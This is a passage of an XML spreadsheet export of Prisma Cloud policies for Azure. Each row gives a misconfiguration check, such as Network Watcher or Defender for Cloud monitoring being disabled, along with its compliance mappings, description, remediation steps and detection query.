        </is>
      </c>
      <c r="Y2360" t="inlineStr"/>
      <c r="Z2360" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-vpn-connection-list' AND json.rule = 'ipsecPolicies is empty and connectionType does not equal ExpressRoute'</t>
        </is>
      </c>
      <c r="AA2360" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2360" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2360" t="inlineStr">
        <is>
          <t>PC-AZR-VPN-108</t>
        </is>
      </c>
      <c r="AD2360" t="b">
        <v>1</v>
      </c>
      <c r="AE2360" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2360" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>cb8a243b-c110-4cf0-b5a2-f27f35fc39b3</t>
        </is>
      </c>
      <c r="AI2360" t="inlineStr">
        <is>
          <t>f3ef9435-8080-45ec-ad14-8850b39052ae</t>
        </is>
      </c>
      <c r="AJ2360" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2360" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2361">
      <c r="A2361" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (Azure) Level 2, CIS v2.1.0 (Azure) Level 2, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2361" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2361" s="2" t="inlineStr"/>
      <c r="D2361" t="inlineStr"/>
      <c r="E2361" t="inlineStr"/>
      <c r="F2361" t="inlineStr"/>
      <c r="G2361" t="b">
        <v>1</v>
      </c>
      <c r="H236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61" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2361" t="inlineStr">
        <is>
          <t>azure-network-watcher</t>
        </is>
      </c>
      <c r="K2361" t="inlineStr">
        <is>
          <t>Azure Network Watcher not enabled</t>
        </is>
      </c>
      <c r="L2361" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2361" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2361" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2361" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2361" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2361" t="inlineStr">
        <is>
          <t>LT</t>
        </is>
      </c>
      <c r="R2361" t="inlineStr">
        <is>
          <t>LT-4</t>
        </is>
      </c>
      <c r="S2361" t="inlineStr"/>
      <c r="T2361" t="b">
        <v>0</v>
      </c>
      <c r="U2361" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2361" t="inlineStr">
        <is>
          <t>azure-network-watcher-list</t>
        </is>
      </c>
      <c r="W2361" t="inlineStr">
        <is>
          <t>This policy identifies Azure subscription regions where Network Watcher is not enabled.
Azure Network Watcher provides tools to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. Without Network Watcher enabled, you lose critical capabilities to monitor and diagnose network issues, making it difficult to identify and resolve performance bottlenecks, network security rules, and connectivity issues.
As a best practice, it is recommended to enable Azure Network Watcher for your region to leverage its monitoring and diagnostic capabilities.</t>
        </is>
      </c>
      <c r="X2361" t="inlineStr">
        <is>
          <t>Note: Enabling Network Watcher will incur costs. There are additional costs per transaction to run and store network data. For high-
volume networks these charges will add up quickly.
To enable Network Watcher, follow the below URL:
https://learn.microsoft.com/en-us/azure/network-watcher/network-watcher-create?tabs=portal#enable-network-watcher-for-your-region</t>
        </is>
      </c>
      <c r="Y2361" t="inlineStr"/>
      <c r="Z2361" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-watcher-list' AND json.rule = provisioningState equals Succeeded as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2361" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2361" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2361" t="inlineStr">
        <is>
          <t>PC-AZR-NWW-1253</t>
        </is>
      </c>
      <c r="AD2361" t="b">
        <v>1</v>
      </c>
      <c r="AE2361" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2361" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG236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61" t="inlineStr">
        <is>
          <t>924841db-c2df-400b-9bf5-47479e18d03c</t>
        </is>
      </c>
      <c r="AI2361" t="inlineStr">
        <is>
          <t>4a4a5f57-9ce9-4e82-9d3a-4f82fca95d7d</t>
        </is>
      </c>
      <c r="AJ2361" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2361" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2362">
      <c r="A2362" t="inlineStr">
        <is>
          <t>Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS Controls v8, NIST CSF, ISO/IEC 27017:2015, CIS v1.1 (Azure), CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), Fedramp (Moderate), CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], PIPEDA, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, CCPA 2018, CyberSecurity Law of the People's Republic of China, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2362" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2362" s="2" t="inlineStr"/>
      <c r="D2362" t="inlineStr"/>
      <c r="E2362" t="inlineStr"/>
      <c r="F2362" t="inlineStr"/>
      <c r="G2362" t="b">
        <v>0</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2362" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2362" t="inlineStr">
        <is>
          <t>Copy of Azure Microsoft Defender for Cloud JIT network access monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2362" t="inlineStr"/>
      <c r="M2362" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2362" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2362" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2362" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2362" t="inlineStr">
        <is>
          <t>7</t>
        </is>
      </c>
      <c r="R2362" t="inlineStr">
        <is>
          <t>7.1</t>
        </is>
      </c>
      <c r="S2362" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2362" t="b">
        <v>1</v>
      </c>
      <c r="U2362" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2362" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2362" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have JIT network access monitoring set to disabled. Enabling JIT Network Access will enhance the protection of VMs by creating a Just in Time VM. The JIT VM with NSG rule will restrict the availability of access to the ports to connect to the VM for a pre-set time and only after checking the Role Based Access Control permissions of the user. This feature will control the brute force attacks on the VMs.</t>
        </is>
      </c>
      <c r="X2362" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Management ports of virtual machines should be protected with just-in-time network access control' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2362"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2" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.jitNetworkAccessMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2362" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2362" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2362" t="inlineStr"/>
      <c r="AD2362" t="b">
        <v>0</v>
      </c>
      <c r="AE2362" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2362" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>0ab8984b-e48f-4857-b4fa-dc39aaf9faca</t>
        </is>
      </c>
      <c r="AI2362" t="inlineStr">
        <is>
          <t>e2829c45-f3ec-4689-bf1f-85448e66171c</t>
        </is>
      </c>
      <c r="AJ2362" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2362" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2363">
      <c r="A2363" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, NYDFS 23 CRR-NY 500.0, ITSG-33, NIST SP 800-172, Fedramp (Moderate), NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), SOC 2, HITRUST CSF v.11.2.0, GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 1, CSA CCM v3.0.1, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, ISO 27001:2013, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, SOC 2, TX-RAMP Level 1, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, NIST CSF, NIST CSF, SOC 2, ISO 27001:2013, ITSG-33, ITSG-33, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v9.3 [Deprecated], MLPS 2.0 (Level 2), CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO 27001:2013, ITSG-33, Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1, TX-RAMP Level 1, New Zealand Information Security Manual (NZISM v3.4), NYDFS 23 CRR-NY 500.0, ACSC Information Security Manual (ISM), SOC 2, TX-RAMP Level 1, APRA (CPS 234) Information Security, ISO 27001:2013, NYDFS 23 CRR-NY 500.0, SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, PIPEDA, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, SOC 2, TX-RAMP Level 2, NIST 800-53 Rev4, ISO 27001:2013, CIS v1.1 (Azure), CSA CCM v4.0.12, TX-RAMP Level 2, CIS Controls v8.1, Australian Energy Sector Cyber Security Framework (AESCSF), CCPA 2018, CSA CCM v3.0.1, CSA CCM v4.0.12, NIST CSF, Fedramp (Low), Secure Controls Framework (SCF) - 2022.2.1, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, SOC 2, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, MLPS 2.0 (Level 2), HITRUST CSF v9.3 [Deprecated], Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2363" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2363" s="2" t="inlineStr"/>
      <c r="D2363" t="inlineStr"/>
      <c r="E2363" t="inlineStr"/>
      <c r="F2363" t="inlineStr"/>
      <c r="G2363" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2363" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2363" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud security configurations monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2363" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2363" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2363" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2363" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2363" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2363" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2363" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2363" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2363" t="b">
        <v>1</v>
      </c>
      <c r="U2363" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2363" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2363" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have security configurations monitoring set to disabled. Security configurations will enable the daily analysis of operating system configurations. The rules for hardening the operating system like firewall rules, password and audit policies are reviewed. Recommendations are made for setting the right level of security controls.</t>
        </is>
      </c>
      <c r="X2363" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Vulnerabilities in security configuration on your machines should be remediated' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2363"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3" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.systemConfigurationsMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2363" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2363" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2363" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-112</t>
        </is>
      </c>
      <c r="AD2363" t="b">
        <v>1</v>
      </c>
      <c r="AE2363" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2363" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>19f4c5f1-1785-41b6-95be-2a393f537dad</t>
        </is>
      </c>
      <c r="AI2363" t="inlineStr">
        <is>
          <t>d6fc91e7-aa17-4fc7-ab9e-8b5aad350ba3</t>
        </is>
      </c>
      <c r="AJ2363" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2363" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2364">
      <c r="A2364" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS v1.1 (Azure), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), Fedramp (Moderate), Telecommunications Security Act - TSA, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, TX-RAMP Level 1, SOC 2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, NIST CSF, SOC 2, ITSG-33, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ISO 27001:2013, ITSG-33, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 1, CSA CCM v.4.0.1, ISO 27001:2013, APRA (CPS 234) Information Security, PCI DSS v3.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO 27001:2013, APRA (CPS 234) Information Security, ISO 27001:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Fedramp (Moderate), SOC 2, CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), NIST 800-53 Rev4, CIS Controls v8.1, PCI DSS v3.2.1, APRA (CPS 234) Information Security, NIST 800-53 Rev4, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v.4.0.1, TX-RAMP Level 2, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2364" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2364" s="2" t="inlineStr"/>
      <c r="D2364" t="inlineStr"/>
      <c r="E2364" t="inlineStr"/>
      <c r="F2364" t="inlineStr"/>
      <c r="G2364" t="b">
        <v>1</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2364" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2364" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud endpoint protection monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2364" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2364" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2364" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2364" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2364" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2364" t="inlineStr">
        <is>
          <t>12</t>
        </is>
      </c>
      <c r="R2364" t="inlineStr">
        <is>
          <t>12.1.2</t>
        </is>
      </c>
      <c r="S2364" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2364" t="b">
        <v>1</v>
      </c>
      <c r="U2364" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2364" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2364" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have endpoint protection monitoring set to disabled. Enabling endpoint Protection will make sure that any issues or shortcomings in endpoint protection for all Microsoft Windows virtual machines are identified so that they can, in turn, be removed.</t>
        </is>
      </c>
      <c r="X2364" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Monitor missing Endpoint Protection in Azure Security Center' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2364"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4" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.endpointProtectionMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2364" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2364" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2364" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-113</t>
        </is>
      </c>
      <c r="AD2364" t="b">
        <v>1</v>
      </c>
      <c r="AE2364" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2364" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>5315a853-6a6b-43eb-a771-5906f41130b8</t>
        </is>
      </c>
      <c r="AI2364" t="inlineStr">
        <is>
          <t>6f0e6015-1c85-4856-ba23-8eded8b600a2</t>
        </is>
      </c>
      <c r="AJ2364" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2364" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2365">
      <c r="A2365" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CIS v1.5.0 (Azure) - Level 2, CIS v2.1.0 (Azure) Level 1, NIST SP 800-172, ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, APRA (CPS 234) Information Security, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, PCI DSS v3.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, APRA (CPS 234) Information Security, Telecommunications Security Act - TSA, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, TX-RAMP Level 1, NIST 800-53 Rev4, CIS v1.1 (Azure), DORA, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, CIS v2.0.0 (Azure) Level 1, NIST CSF, ITSG-33, CSA CCM v3.0.1, NIST 800-53 Rev4, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev4, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v.4.0.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ITSG-33, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 1, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Fedramp (Moderate), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, NYDFS 23 CRR-NY 500.0, Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v3.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, NIST 800-53 Rev 5, CSA CCM v3.0.1, CIS Controls v8.1, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CyberSecurity Law of the People's Republic of China, Fedramp (Moderate), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 2, NIST SP 800-171 Revision 3, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2365" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2365" s="2" t="inlineStr"/>
      <c r="D2365" t="inlineStr"/>
      <c r="E2365" t="inlineStr"/>
      <c r="F2365" t="inlineStr"/>
      <c r="G2365" t="b">
        <v>1</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2365" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2365" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud system updates monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2365" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2365" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2365" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2365" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2365" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2365" t="inlineStr">
        <is>
          <t>12</t>
        </is>
      </c>
      <c r="R2365" t="inlineStr">
        <is>
          <t>12.1.2</t>
        </is>
      </c>
      <c r="S2365" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2365" t="b">
        <v>1</v>
      </c>
      <c r="U2365" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2365" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2365" t="inlineStr">
        <is>
